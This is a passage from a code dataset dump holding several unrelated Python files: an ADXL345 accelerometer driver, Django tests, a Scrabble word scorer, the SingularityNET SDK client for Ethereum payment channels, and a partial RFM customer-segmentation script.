0x08\nDATA_FORMAT = 0x31\nAXES_DATA = 0x32\nBW_RATE = 0x2C\nRANGE_2G = 0x00\nSCALE_MULTIPLIER = 0.004\nEARTH_GRAVITY_MS2 = 9.80665\n\nclass ADXL345(object):\n\t\n\n\tdef __init__(self, i2c=None):\n\t\tself.i2c = i2c\n\t\tself.addr = ADXL345_ADDR\n\t\tprint('One')\n\t\tself.setBandwidthRate(BW_RATE_100HZ)\n\t\tself.setRange(RANGE_2G)\n\t\tself.enableMeasurement()\n\n\tdef enableMeasurement(self):\n\t\ti2c.writeto(self.addr, bytes([POWER_CTL]))\n\t\ti2c.writeto(self.addr, bytes([MEASURE])) \n\n\tdef setBandwidthRate(self, rate_flag):\n\t\tprint('Two')\n\t\ti2c.writeto_mem(self.addr, BW_RATE, bytes([rate_flag]))\n # i2c.writeto_mem(self.addr, BW_RATE, rate_flag)\n\n\n\tdef setRange(self, range_flag):\n\t\tvalue = i2c.readfrom_mem(self.addr, DATA_FORMAT, range_flag)\n\t\tprint('here')\n\t\tvalue &= ~0x0F;\n\t\tvalue |= range_flag;\n\t\tvalue |= 0x08;\n\n\t\ti2c.writeto(self.addr, DATA_FORMAT, value)\n\n\tdef getAxes(self, gforce = False):\n\t\tbytes = i2c.readfrom(self.addr, AXES_DATA, 6)\n\n\t\tx = bytes[0] | (bytes[1] << 8)\n\t\tif(x & (1 << 16 - 1)):\n\t\t\tx = x - (1<<16)\n\n\t\ty = bytes[2] | (bytes[3] << 8)\n\t\tif(y & (1 << 16 - 1)):\n\t\t\ty = y - (1<<16)\n\n\t\tz = bytes[4] | (bytes[5] << 8 )\n\t\tif(z & (1 << 16 - 1)):\n\t\t\tz = z - (1<<16)\n\n\t\tx = x * SCALE_MULTIPLIER\n\t\ty = y * SCALE_MULTIPLIER\n\t\tz = z * SCALE_MULTIPLIER\n\n\t\tif gforce == False: \n\t\t\tx = x * EARTH_GRAVITY_MS2\n\t\t\ty = y * EARTH_GRAVITY_MS2\n\t\t\tz = z * EARTH_GRAVITY_MS2\n\n\t\tx = round(x,4)\n\t\ty = round(y,4)\n\t\tz = round(z,4)\n\n\t\treturn {\"x\": x, \"y\": y, \"z\": z}\nprint('Start')\n\nfor i in range(0,10):\n\tadxl345 = ADXL345()\n\taxes = adxl345.getAxes(True)\n\tprint(axes['x'])\n\tsleep_ms(25)","sub_path":"iotprojectSignapore/adxl345.py","file_name":"adxl345.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"84275018","text":"from django.test import TestCase\n\nfrom kursovaya.api import GetMaximumMark\n\n\nclass URLTests(TestCase):\n def test_homepage(self):\n response = self.client.get('/')\n self.assertEqual(response.status_code, 200)\n\n\nclass StatisticTest(TestCase):\n def test_get_min_mark(self):\n content = [\n ['subject', 'mark1', 'mark2'],\n ['sub1', '61', '78'],\n ['sub2', '90', '92']\n ]\n min_mark_cmd = GetMinimumMark()\n min_mark = min_mark_cmd.execute(content)\n self.assertEqual(min_mark, 'sub1, 61.0, sub2, 90.0')\n\n def test_get_max_mark(self):\n content = [\n ['subject', 'mark1', 'mark2'],\n ['sub1', '61', '78'],\n ['sub2', '90', '92']\n ]\n max_mark_cmd = GetMaximumMark()\n max_mark = max_mark_cmd.execute(content)\n self.assertEqual(max_mark, 'sub1, 78.0, sub2, 92.0')\n","sub_path":"kursovaya/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"264919397","text":"import sys\n\nclass InputValidator:\n '''this is the class related to input\n do the inputcheck, and get the permutation of the input letters'''\n \n\n def inputcheck(self):\n import re \n\n while True:\n your_word = input('> Enter the each letter in your rack: ')\n \n your_match = re.findall(r'[a-zA-z]+', your_word) #use the regular expression to do the format check\n valid_word = ''\n for i in your_match:\n valid_word += i\n #print(valid_word)\n \n #if pass the regular expression check, jump out of the while loop, and then excuate the following functions. \n #if fail the regualer expression check, tell the user the reason, and ask the user to enter an input again. \n if valid_word == '':\n print('Please enter letters only.') \n \n elif len(valid_word) > 7:\n print('Please enter less than 7 letters. ')\n else:\n break \n return valid_word \n\n def possible_word(self,valid_word):\n import itertools\n\n words = valid_word\n counted = []\n #print(words)\n for i in range(2,len(words)+1):\n possible_word = list(itertools.permutations(words,i)) #using itertools module to find all the permutations of the input letter)\n for j in possible_word:\n j = ''.join(tuple(j)) #since the type of j is tuple, in order to do the matching successfully, convert the tuple to string format. \n counted.append(j)\n '''\n for allowed in allowed_words: \n #print(allowed)\n #print(type(allowed))\n if j == allowed.lower():\n counted.append(j)\n ''' \n return counted\n \n\nyour_input = InputValidator()\nu_input = your_input.inputcheck()\nu_possible = your_input.possible_word(u_input)\n#print(u_input)\n#print(u_possible)\n\nclass WordValidator:\n '''this is the class used to get the valided words, \n read the 'allowed_scrabble_words.txt file to generate all allowed words, \n and then find the common words in' all allowed words' and the list of 'all the permutuations of the input letters' '''\n\n def reading(self):\n f = open('Allowed_Scrabble_words.txt','r')\n ff = f.readlines()\n f.close\n allowed_words = []\n for lines in ff:\n lines = lines.replace(' ','')\n lines = lines.replace('|','')\n lines = lines.replace('\\n','')\n count_word = lines.lower()\n allowed_words.append(count_word)\n return allowed_words\n\n def matching(self,allowed_words,counted):\n valid_word = []\n for i in counted:\n for allowed in allowed_words: \n if i == allowed.lower():\n valid_word.append(i)\n return valid_word\n\nyour_word = WordValidator()\nu_word = your_word.reading()\nu_match = your_word.matching(u_word,u_possible)\n\n#print(u_match)\n\n\n\nclass ScoreGenerator:\n '''this is the class related to calcuated scores,\n calcuate the scores, sorte them, and then write the new file'''\n \n\n def score(self,u_match): \n tile_score = {\"a\": 1, \"c\": 3, \"b\": 3, \"e\": 1, \"d\": 2, \"g\": 2,\n \"f\": 4, \"i\": 1, \"h\": 4, \"k\": 5, \"j\": 8, \"m\": 3,\n \"l\": 1, \"o\": 1, \"n\": 1, \"q\": 10, \"p\": 3, \"s\": 1,\n \"r\": 1, \"u\": 1, \"t\": 1, \"w\": 4, \"v\": 4, \"y\": 4,\n \"x\": 8, \"z\": 10}\n \n total_score = {} #create a dict to store different words, and their scores. \n for i in u_match:\n total = 0 \n for j in i:\n total += tile_score[j]\n total_score[i] = total #add k,v to the dict{total_score}\n \n return total_score\n \n\n def sorting(self,total_score):\n import json\n #sort the dict by values. \n sorted_total_score = sorted(total_score.items(), key=lambda x: x[1], reverse=True)\n filef = open('input_letter_words_sorted.txt','w')\n #filef.writelines(str(sorted_total_score))\n filef.writelines(json.dumps(sorted_total_score))\n filef.close()\n \n\nyour_score = ScoreGenerator()\nu_score = your_score.score(u_match)\nyour_score.sorting(u_score)\n\n#print(u_score)\n\n#final_score = your_score.sortinf(u_score) ----OUTPUT IS 'NONE'\n#print(final_score) ----- OUTPUT IS 'NONE' (since there is no return in the sorting() function. )\n#print(your_score.sorting(u_score)) ----OUTPUT IS 'NONE'\n# since sorting() has no return, the output of print(sorting) will be 'NONE', DO NOT FORGET ADD 'RETURN' FUNCTION\n\n \n\n \n\n\n \n ","sub_path":"problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"129607073","text":"import operator\nfrom functools import reduce\nimport sys\nimport os \nimport importlib\nimport json\nimport base64\nfrom pathlib import PurePath, Path\nfrom urllib.parse import urljoin\n\nimport ecdsa\nimport hashlib\nimport grpc\nimport collections\nimport web3\nfrom web3.gas_strategies.rpc import rpc_gas_price_strategy\nfrom eth_account.messages import defunct_hash_message\nfrom rfc3986 import urlparse\nimport ipfsapi\nfrom web3.utils.datastructures import AttributeDict, MutableAttributeDict\n\nimport snet_sdk.generic_client_interceptor as generic_client_interceptor\n\n__version__ = \"0.0.1\"\n\nmain_dir_path = PurePath(os.path.abspath(sys.modules['__main__'].__file__)).parent\ncur_dir = PurePath(os.path.realpath(__file__)).parent\n\n\nclass TransactionError(Exception):\n \"\"\"Raised when an Ethereum transaction receipt has a status of 0. Can provide a custom message. Optionally includes receipt\"\"\"\n def __init__(self, message, receipt=None):\n super().__init__(message)\n self.message = message\n self.receipt = receipt\n def __str__(self):\n return self.message\n\n\nclass ChannelOpenEncoder(json.JSONEncoder):\n def default(self, obj):\n if type(obj) is bytes:\n return base64.b64encode(obj).decode(\"ascii\")\n else:\n super().default(self, obj)\n\n\nclass _ClientCallDetails(\n collections.namedtuple(\n '_ClientCallDetails',\n ('method', 'timeout', 'metadata', 'credentials')),\n grpc.ClientCallDetails):\n pass\n\n\nsnet_sdk_defaults = {\n \"libraries_base_path\": \"grpc\",\n \"eth_rpc_endpoint\": \"https://kovan.infura.io\",\n \"ipfs_rpc_endpoint\": \"http://ipfs.singularitynet.io:80\",\n \"private_key\": None,\n \"signer_private_key\": None,\n \"account_index\": 0,\n \"default_gas\": 1000000,\n \"mpe_address\": None,\n \"token_address\": None,\n \"allow_transactions\": False\n}\n\n\nclass Snet:\n \"\"\"Base Snet SDK\"\"\"\n def __init__(\n self,\n config=None,\n libraries_base_path=snet_sdk_defaults[\"libraries_base_path\"],\n eth_rpc_endpoint=snet_sdk_defaults[\"eth_rpc_endpoint\"],\n ipfs_rpc_endpoint=snet_sdk_defaults[\"ipfs_rpc_endpoint\"],\n private_key=snet_sdk_defaults[\"private_key\"],\n signer_private_key=snet_sdk_defaults[\"signer_private_key\"],\n account_index=snet_sdk_defaults[\"account_index\"],\n default_gas=snet_sdk_defaults[\"default_gas\"],\n mpe_address=snet_sdk_defaults[\"mpe_address\"],\n token_address=snet_sdk_defaults[\"token_address\"],\n allow_transactions=snet_sdk_defaults[\"allow_transactions\"]\n ):\n self.libraries_base_path = libraries_base_path\n self.default_gas = default_gas\n self.allow_transactions = allow_transactions\n self.nonce = 0\n self.logs = None\n\n if private_key is not None:\n if private_key.startswith(\"0x\"):\n self.private_key = bytes(bytearray.fromhex(private_key[2:]))\n else:\n self.private_key = bytes(bytearray.fromhex(private_key))\n\n public_key = ecdsa.SigningKey.from_string(string=self.private_key,\n curve=ecdsa.SECP256k1,\n hashfunc=hashlib.sha256).get_verifying_key()\n self.address = web3.Web3.toChecksumAddress(\"0x\" + web3.Web3.sha3(hexstr=public_key.to_string().hex())[12:].hex())\n else: # Working with an unlocked account, for example\n self.address = web3.Web3.toChecksumAddress(web3.eth.accounts[account_index])\n\n\n if self.private_key is not None and signer_private_key is None:\n self.signer_private_key = self.private_key\n else:\n self.signer_private_key = signer_private_key\n\n signer_public_key = ecdsa.SigningKey.from_string(string=self.private_key,\n curve=ecdsa.SECP256k1,\n hashfunc=hashlib.sha256).get_verifying_key()\n\n self.signer_address = web3.Web3.toChecksumAddress(\"0x\" + web3.Web3.sha3(hexstr=signer_public_key.to_string().hex())[12:].hex())\n\n\n # Instantiate Ethereum client\n provider = web3.HTTPProvider(eth_rpc_endpoint)\n self.web3 = web3.Web3(provider)\n self.web3.eth.setGasPriceStrategy(rpc_gas_price_strategy)\n\n # Get average block time for current network\n latest = self.web3.eth.getBlock(\"latest\")\n times = [block.timestamp for block in list(map(lambda n: self.web3.eth.getBlock(n), range(latest.number, latest.number-20, -1)))]\n diffs = list(map(operator.sub, times[1:], times[:-1]))\n self.average_block_time = abs(reduce(lambda a, b: a+b, diffs) / len(diffs))\n\n # Instantiate IPFS client\n ipfs_rpc_endpoint = urlparse(ipfs_rpc_endpoint)\n ipfs_scheme = ipfs_rpc_endpoint.scheme if ipfs_rpc_endpoint.scheme else \"http\"\n ipfs_port = ipfs_rpc_endpoint.port if ipfs_rpc_endpoint.port else 5001\n self.ipfs_client = ipfsapi.connect(urljoin(ipfs_scheme, ipfs_rpc_endpoint.hostname), ipfs_port)\n\n # Get contract objects\n self.mpe_contract = self._get_contract_object(\"MultiPartyEscrow.json\")\n self.token_contract = self._get_contract_object(\"SingularityNetToken.json\")\n self.registry_contract = self._get_contract_object(\"Registry.json\")\n\n\n # Generic Eth transaction functions \n def _get_contract_deployment_block(self, contract_file):\n with open(cur_dir.joinpath(\"resources\", \"contracts\", \"networks\", contract_file)) as f:\n networks = json.load(f)\n txn_hash = networks[self.web3.version.network][\"transactionHash\"]\n return self.web3.eth.getTransactionReceipt(txn_hash).blockNumber\n\n def _get_nonce(self):\n nonce = self.web3.eth.getTransactionCount(self.address)\n if self.nonce >= nonce:\n nonce = self.nonce + 1\n self.nonce = nonce\n return nonce\n\n\n def _get_gas_price(self):\n return self.web3.eth.generateGasPrice()\n\n\n def _send_signed_transaction(self, contract_fn, *args):\n transaction = contract_fn(*args).buildTransaction({\n \"chainId\": int(self.web3.version.network),\n \"gas\": self.default_gas, \n \"gasPrice\": self._get_gas_price(),\n \"nonce\": self._get_nonce()\n })\n signed_txn = self.web3.eth.account.signTransaction(transaction, private_key=self.private_key)\n return self.web3.toHex(self.web3.eth.sendRawTransaction(signed_txn.rawTransaction))\n\n\n def _send_transaction(self, contract_fn, *args):\n if self.private_key is not None:\n txn_hash = self._send_signed_transaction(contract_fn, *args)\n else:\n txn_hash = contract_fn(*args).transact({\n \"gas\": self.default_gas,\n \"gasPrice\": gas_price\n })\n return self.web3.eth.waitForTransactionReceipt(txn_hash)\n\n\n def _parse_receipt(self, receipt, event, encoder=json.JSONEncoder):\n if receipt.status == 0:\n raise TransactionError(\"Transaction failed\", receipt)\n else:\n return json.dumps(dict(event().processReceipt(receipt)[0][\"args\"]), cls=encoder)\n\n\n def _update_channel_data_from_blockchain(self, channel):\n channel_blockchain_data = self.mpe_contract.functions.channels(channel[\"channelId\"]).call()\n channel = dict(channel)\n channel[\"nonce\"] = channel_blockchain_data[0]\n channel[\"amount\"] = channel_blockchain_data[5]\n channel[\"expiration\"] = channel_blockchain_data[6]\n return AttributeDict(channel)\n\n\n def _get_channels(self, recipient_address=None):\n topics = [self.web3.sha3(text=\"ChannelOpen(uint256,uint256,address,address,address,bytes32,uint256,uint256)\").hex()]\n if self.logs is None:\n self.logs = self.web3.eth.getLogs({\"fromBlock\" : self._get_contract_deployment_block(\"MultiPartyEscrow.json\"), \"address\": self.mpe_contract.address, \"topics\": topics})\n event_abi = {'anonymous': False, 'inputs': [{'indexed': False, 'name': 'channelId', 'type': 'uint256'}, {'indexed': False, 'name': 'nonce', 'type': 'uint256'}, {'indexed': True, 'name': 'sender', 'type': 'address'}, {'indexed': False, 'name': 'signer', 'type': 'address'}, {'indexed': True, 'name': 'recipient', 'type': 'address'}, {'indexed': True, 'name': 'groupId', 'type': 'bytes32'}, {'indexed': False, 'name': 'amount', 'type': 'uint256'}, {'indexed': False, 'name': 'expiration', 'type': 'uint256'}], 'name': 'ChannelOpen', 'type': 'event'}\n if recipient_address is None:\n channels = list(filter(lambda channel: channel.sender == self.address and channel.signer == self.signer_address, [web3.utils.events.get_event_data(event_abi, l)[\"args\"] for l in self.logs]))\n else:\n channels = list(filter(lambda channel: channel.sender == self.address and channel.signer == self.signer_address and channel.recipient == recipient_address, [web3.utils.events.get_event_data(event_abi, l)[\"args\"] for l in self.logs]))\n\n return list(map(lambda c: self._update_channel_data_from_blockchain(c), channels))\n\n\n # Contract functions \n def _token_approve_transfer(self, value):\n already_approved = self.token_contract.functions.allowance(self.address, self.mpe_contract.address).call()\n if (already_approved < value):\n self._send_transaction(self.token_contract.functions.approve, self.mpe_contract.address, value - already_approved)\n\n\n def mpe_deposit(self, value):\n self._token_approve_transfer(value)\n receipt = self._send_transaction(self.mpe_contract.functions.deposit, value)\n return self._parse_receipt(receipt, self.mpe_contract.events.DepositFunds)\n\n\n def mpe_withdraw(self, value):\n receipt = self._send_transaction(self.mpe_contract.functions.withdraw, value)\n return self._parse_receipt(receipt, self.mpe_contract.events.WithdrawFunds)\n\n\n def mpe_open_channel(self, recipient_address, group_id, value, expiration):\n receipt = self._send_transaction(self.mpe_contract.functions.openChannel, self.signer_address, recipient_address, group_id, value, expiration)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelOpen, encoder=ChannelOpenEncoder)\n\n\n def mpe_deposit_and_open_channel(self, recipient_address, group_id, value, expiration):\n self._token_approve_transfer(value)\n receipt = self._send_transaction(self.mpe_contract.functions.depositAndOpenChannel, self.signer_address, recipient_address, group_id, value, expiration)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelOpen, encoder=ChannelOpenEncoder)\n\n\n def mpe_channel_extend(self, channel_id, new_expiration):\n receipt = self._send_transaction(self.mpe_contract.functions.channelExtend, channel_id, new_expiration)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelExtend)\n\n\n def mpe_channel_add_funds(self, channel_id, amount):\n receipt = self._send_transaction(self.mpe_contract.functions.channelAddFunds, channel_id, amount)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelAddFunds)\n\n \n def mpe_channel_extend_and_add_funds(self, channel_id, new_expiration, amount):\n receipt = self._send_transaction(self.mpe_contract.functions.channelExtendAndAddFunds, channel_id, new_expiration, amount)\n return self._parse_receipt(receipt, self.mpe_contract.events.ChannelAddFunds)\n\n\n # Generic utility functions\n def _get_contract_object(self, contract_file):\n with open(cur_dir.joinpath(\"resources\", \"contracts\", \"abi\", contract_file)) as f:\n abi = json.load(f)\n with open(cur_dir.joinpath(\"resources\", \"contracts\", \"networks\", contract_file)) as f:\n networks = json.load(f)\n address = self.web3.toChecksumAddress(networks[self.web3.version.network][\"address\"])\n return self.web3.eth.contract(abi=abi, address=address)\n\n\n def _get_base_grpc_channel(self, endpoint):\n endpoint_object = urlparse(endpoint)\n if endpoint_object.port is not None:\n channel_endpoint = endpoint_object.hostname + \":\" + str(endpoint_object.port)\n else: \n channel_endpoint = endpoint_object.hostname\n\n if endpoint_object.scheme == \"http\":\n return grpc.insecure_channel(channel_endpoint)\n elif endpoint_object.scheme == \"https\":\n return grpc.secure_channel(channel_endpoint, grpc.ssl_channel_credentials())\n else:\n raise ValueError('Unsupported scheme in service metadata (\"{}\")'.format(endpoint_object.scheme))\n\n\n # Service client\n def client(self, *args, org_id=None, service_id=None, channel_id=None):\n client = MutableAttributeDict({})\n\n # Determine org_id, service_id and channel_id for client\n _org_id = org_id\n _service_id = service_id\n _channel_id = channel_id\n\n if len(args) == 2:\n (_org_id, _service_id) = args\n if len(args) == 1:\n raise ValueError(\"Please either provide both organization id and service id as positional arguments or none of them\")\n\n if (_org_id is not None or _service_id is not None) and (org_id is not None or service_id is not None):\n raise ValueError(\"Please provide organization id and service id either as positional arguments or as keyword arguments\")\n \n if org_id is not None and _service_id is not None:\n _org_id = org_id\n _service_id = service_id\n\n if _org_id is None or _service_id is None:\n raise ValueError(\"\"\"Could not instantiate client.\n Please provide at least an org_id and a service_id either as positional or keyword arguments\"\"\")\n\n\n # Get client metadata for service\n (found, registration_id, metadata_uri, tags) = self.registry_contract.functions.getServiceRegistrationById(bytes(_org_id, \"utf-8\"), bytes(_service_id, \"utf-8\")).call()\n client.metadata = AttributeDict(json.loads(self.ipfs_client.cat(metadata_uri.rstrip(b\"\\0\").decode('ascii')[7:])))\n default_group = AttributeDict(client.metadata.groups[0])\n client.default_payment_address = default_group[\"payment_address\"]\n default_channel_value = client.metadata.pricing[\"price_in_cogs\"]*100\n default_channel_expiration = int(self.web3.eth.getBlock(\"latest\").number + client.metadata.payment_expiration_threshold + (3600*24*7/self.average_block_time))\n service_endpoint = None\n for endpoint in client.metadata[\"endpoints\"]:\n if (endpoint[\"group_name\"] == default_group[\"group_name\"]):\n service_endpoint = endpoint[\"endpoint\"]\n break\n\n\n # Functions to get a funded channel with a combination of calls to the blockchain and to the daemon \n grpc_channel = self._get_base_grpc_channel(service_endpoint)\n\n channel_state_service_proto_path = str(cur_dir.joinpath(\"resources\", \"proto\"))\n sys.path.insert(0, channel_state_service_proto_path)\n _state_service_pb2 = importlib.import_module(\"state_service_pb2\")\n _state_service_pb2_grpc = importlib.import_module(\"state_service_pb2_grpc\")\n sys.path.remove(channel_state_service_proto_path)\n\n\n def _get_channel_state(channel_id):\n stub = _state_service_pb2_grpc.PaymentChannelStateServiceStub(grpc_channel)\n message = web3.Web3.soliditySha3([\"uint256\"], [channel_id])\n signature = self.web3.eth.account.signHash(defunct_hash_message(message), self.signer_private_key).signature\n request = _state_service_pb2.ChannelStateRequest(channel_id=web3.Web3.toBytes(channel_id), signature=bytes(signature))\n response = stub.GetChannelState(request)\n return {\n \"current_nonce\": int.from_bytes(response.current_nonce, byteorder=\"big\"),\n \"current_signed_amount\": int.from_bytes(response.current_signed_amount, byteorder=\"big\")\n }\n\n\n def _get_channel_states():\n return [dict(_get_channel_state(channel.channelId), **{\"channel_id\": channel.channelId, \"initial_amount\": channel.amount, \"expiration\": channel.expiration}) for channel in self._get_channels(client.default_payment_address)]\n\n\n def _client_open_channel(value, expiration):\n mpe_balance = self.mpe_contract.functions.balances(self.address).call()\n group_id = base64.b64decode(default_group.group_id)\n if value > mpe_balance:\n return(self.mpe_deposit_and_open_channel(default_group.payment_address, group_id, value - mpe_balance, expiration))\n else:\n return(self.mpe_open_channel(default_group.payment_address, group_id, value, expiration))\n\n\n def _client_add_funds(channel_id, amount):\n mpe_balance = self.mpe_contract.functions.balances(self.address).call()\n if value > mpe_balance:\n self.mpe_deposit(amount - mpe_balance)\n return(self.mpe_channel_add_funds(channel_id, amount))\n\n\n def _client_extend_and_add_funds(channel_id, new_expiration, amount):\n mpe_balance = self.mpe_contract.functions.balances(self.address).call()\n if amount > mpe_balance:\n self.mpe_deposit(amount - mpe_balance)\n return(self.mpe_channel_extend_and_add_funds(channel_id, new_expiration, amount))\n\n\n def _get_funded_channel():\n channel_states = _get_channel_states()\n\n if len(channel_states) == 0:\n if self.allow_transactions is False:\n raise RuntimeError('No state channel found. Please open a new channel or set configuration parameter \"allow_transactions=True\" when creating Snet class instance')\n else:\n _client_open_channel(default_channel_value, default_channel_expiration)\n channel_states = _get_channel_states()\n\n funded_channels = list(filter(lambda state: state[\"initial_amount\"] - state[\"current_signed_amount\"] >= int(client.metadata.pricing[\"price_in_cogs\"]), iter(channel_states)))\n if len(funded_channels) == 0:\n if self.allow_transactions is True:\n non_expired_unfunded_channels = list(filter(lambda state: state[\"expiration\"] + client.metadata.payment_expiration_threshold > self.web3.eth.getBlock(\"latest\").number, iter(channel_states)))\n if len(non_expired_unfunded_channels) == 0:\n channel_id = next(iter(channel_states))[\"channel_id\"]\n _client_extend_and_add_funds(channel_id, default_channel_expiration, default_channel_value)\n return channel_id\n else:\n channel_id = next(iter(non_expired_unfunded_channels))[\"channel_id\"]\n _client_add_funds(channel_id, default_channel_value)\n return channel_id\n else:\n raise RuntimeError('No funded channel found. Please open a new channel or fund an open one, or set configuration parameter \"allow_transactions=True\" when creating Snet class instance')\n\n valid_channels = list(filter(lambda state: state[\"expiration\"] + client.metadata.payment_expiration_threshold > self.web3.eth.getBlock(\"latest\").number, iter(funded_channels)))\n if len(valid_channels) == 0:\n if self.allow_transactions is True:\n channel_id = next(iter(funded_channels))[\"channel_id\"]\n self.mpe_channel_extend(channel_id, default_channel_expiration)\n return channel_id\n else:\n raise RuntimeError('No non-expired channel found. Please open a new channel or extend an open and funded one, or set configuration parameter \"allow_transactions=True\" when creating Snet class instance')\n else:\n channel_id = next(iter(valid_channels))[\"channel_id\"]\n\n return channel_id\n\n\n if _channel_id is None:\n _channel_id = _get_funded_channel() \n\n\n # Import modules and add them to client grpc object\n libraries_base_path = self.libraries_base_path\n\n client_library_path = str(main_dir_path.joinpath(self.libraries_base_path, _org_id, _service_id))\n sys.path.insert(0, client_library_path)\n\n grpc_modules = []\n for module_path in Path(client_library_path).glob(\"**/*_pb2.py\"):\n grpc_modules.append(module_path)\n for module_path in Path(client_library_path).glob(\"**/*_pb2_grpc.py\"):\n grpc_modules.append(module_path)\n\n grpc_modules = list(map(\n lambda x: str(PurePath(Path(x).relative_to(client_library_path).parent.joinpath(PurePath(x).stem))),\n grpc_modules\n ))\n\n imported_modules = MutableAttributeDict({})\n for grpc_module in grpc_modules:\n imported_module = importlib.import_module(grpc_module)\n imported_modules[grpc_module] = imported_module\n\n sys.path.remove(client_library_path)\n\n\n # Service channel utility methods\n def _get_service_call_metadata(channel_id):\n state = _get_channel_state(channel_id)\n amount = state[\"current_signed_amount\"] + int(client.metadata.pricing[\"price_in_cogs\"])\n message = web3.Web3.soliditySha3(\n [\"address\", \"uint256\", \"uint256\", \"uint256\"],\n [self.mpe_contract.address, channel_id, state[\"current_nonce\"], amount]\n )\n signature = bytes(self.web3.eth.account.signHash(defunct_hash_message(message), self.signer_private_key).signature)\n metadata = [\n (\"snet-payment-type\", \"escrow\"),\n (\"snet-payment-channel-id\", str(channel_id)),\n (\"snet-payment-channel-nonce\", str(state[\"current_nonce\"])),\n (\"snet-payment-channel-amount\", str(amount)),\n (\"snet-payment-channel-signature-bin\", signature)\n ]\n\n return metadata\n\n\n # Client exports\n client.open_channel = lambda value=default_channel_value, expiration=default_channel_expiration: _client_open_channel(value, expiration)\n client.get_service_call_metadata = lambda: _get_service_call_metadata(_channel_id)\n client.grpc = imported_modules\n\n def intercept_call(client_call_details, request_iterator, request_streaming,\n response_streaming):\n metadata = []\n if client_call_details.metadata is not None:\n metadata = list(client_call_details.metadata)\n metadata.extend(client.get_service_call_metadata())\n client_call_details = _ClientCallDetails(\n client_call_details.method, client_call_details.timeout, metadata,\n client_call_details.credentials)\n return client_call_details, request_iterator, None\n\n client.grpc_channel = grpc.intercept_channel(grpc_channel, generic_client_interceptor.create(intercept_call))\n\n\n return client \n","sub_path":"snet_sdk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":23204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"248438415","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 8 23:29:53 2020\n\n@author: USER\n\"\"\"\n\nimport pandas as pd \nimport numpy as np\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport datetime as dt\n\n\ndf_tr = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='Transactions')\ndf_nc = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='NewCustomerList')\ndf_cd = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='CustomerDemographic')\ndf_ca = pd.read_excel (r'Updated_dataset.xlsx', sheet_name='CustomerAddress')\n\n#df_tr.describe()\n#df_cd.columns\n\nrfm_data=df_tr[['customer_id','transaction_date','Profit']]\n\n\nrfm_data['transaction_date'] = pd.to_datetime(rfm_data['transaction_date'])\n\n\n\n#For Monetary, Calculate sum of purchase price for each customer\n\n#rfm_data.groupby(['customer_id']).groups.keys()\n#rfm_data.groupby(['customer_id']).first()\ndf_profit=rfm_data.groupby(['customer_id'])['Profit'].sum()\n\n\n#For Frequency, Calculate the number of orders for each customer\ndf_l=df_tr.groupby(['customer_id'])['customer_id'].count().reset_index(drop=True)\ndf_l=pd.DataFrame(df_l)\ndf_profit=df_profit.reset_index()\ndf_profit=df_profit.merge(df_l, left_index=True, right_index=True, how='outer')\n\n#For Recency, Calculate the number of days between present date and\n# date of last purchase each customer\n\ndf_recency=rfm_data.groupby(['customer_id'])['transaction_date'].max()\ndf_recency=df_recency.reset_index()\nPRESENT = dt.date.today()\ndf_recency.transaction_date= pd.to_datetime(df_recency.transaction_date) \nPRESENT=pd.to_datetime(PRESENT)\n\ndf_recency.transaction_date=(PRESENT-df_recency.transaction_date)\ndf_recency.transaction_date=df_recency.transaction_date.astype(str)\ndf_recency.transaction_date = df_recency.transaction_date.apply(lambda x: int(x.split(' ')[0]))\ndf_recency.transaction_date=df_recency.transaction_date.astype(int)\n\nrfm=df_profit.merge(df_recency['transaction_date'], left_index=True, right_index=True, how='outer')\n\n#Form the RFM dataframe to analyse further\nrfm = rfm.rename(columns = {'customer_id_x': 'CustomerID', 'Profit': 'Monetary','customer_id_y': 'Frequency','transaction_date': 'Recency'}, inplace = False)\n\n#Calculate RFM score\nrfm['M'] = pd.qcut(rfm['Monetary'], 4, ['1','2','3','4'])\nrfm['F'] = pd.qcut(rfm['Frequency'], 4, ['1','2','3','4'])\nrfm['R'] = pd.qcut(rfm['Recency'], 4, ['4','3','2','1'])\n\nrfm['RFM_Segment'] = rfm.R.astype(str)+ rfm.F.astype(str) + rfm.M.astype(str)\nrfm.R=rfm.R.astype(int)\nrfm.F=rfm.F.astype(int)\nrfm.M=rfm.M.astype(int)\nrfm['RFM_Score'] = rfm[['R','F','M']].sum(axis=1)\nprint(rfm['RFM_Score'].unique())\nprint(rfm['RFM_Segment'].unique())\n\n\n# Define rfm_level function\ndef rfm_level(rfm):\n if (rfm['RFM_Segment'] >= 434 or (rfm['RFM_Score'] >= 9)) :\n return 'Platinum customers'\n elif ((rfm['RFM_Score'] >= 8) and (rfm['M'] == 4)):\n return 'Champions Big Spenders'\n elif ((rfm['RFM_Score'] >= 6) and (rfm['F'] >= 2)):\n return 'Loyal Customers'\n elif ((rfm['RFM_Segment'] >= 221) or (rfm['RFM_Score'] >= 6)):\n return 'Potential Loyalists'\n elif (((rfm['RFM_Segment'] >= 121) and (rfm['R'] == 1)) or rfm['RFM_Score'] == 5):\n return 'Needs Attention'\n elif ((rfm['RFM_Score'] >= 4) and (rfm['R'] == 1)):\n return 'Hibernating customers'\n else:\n return 'Lost Customers'\n \n# Define rfm_level function\ndef rfm_action(df):\n if (df['RFM_Segment'] >= 434 or (df['RFM_Score'] >= 9)) :\n return 'No Price Incentives; Offer Limited edition and Loyality programs'\n elif ((df['RFM_Score'] >= 8) and (df['M'] == 4)):\n return 'Upsell most expensive items'\n elif ((df['RFM_Score'] >= 6) and (df['F'] >= 2)):\n return 'Loyality programs;Cross 